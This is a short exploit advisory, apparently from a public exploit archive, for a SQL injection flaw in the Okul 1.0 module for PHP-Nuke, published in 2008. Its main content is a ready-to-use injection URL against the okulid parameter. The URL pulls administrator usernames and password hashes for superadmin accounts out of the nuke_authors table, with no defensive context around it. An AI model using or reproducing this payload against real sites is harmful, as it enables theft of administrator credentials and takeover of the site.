PHP-Nuke Modules Okul 1.0 (okulid) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP-Nuke Modules Okul 1.0 (okulid) Remote SQL Injection Vulnerability
# Published : 2008-02-20
# Author : xoron
# Previous Title : PHP-Nuke Module NukeC 2.1 (id_catg) SQL Injection Vulnerability
# Next Title : Joomla Component com_hwdvideoshare SQL Injection Vulnerability

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

PHP-NUKE Modules Okul v1.0 Remote SQL Injection

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Found: xoron

contact: xorontr@gmail.com (only e-mail)

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Thanx: str0ke, s@bun.

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-= 

# www.Syue.com [2008-02-20]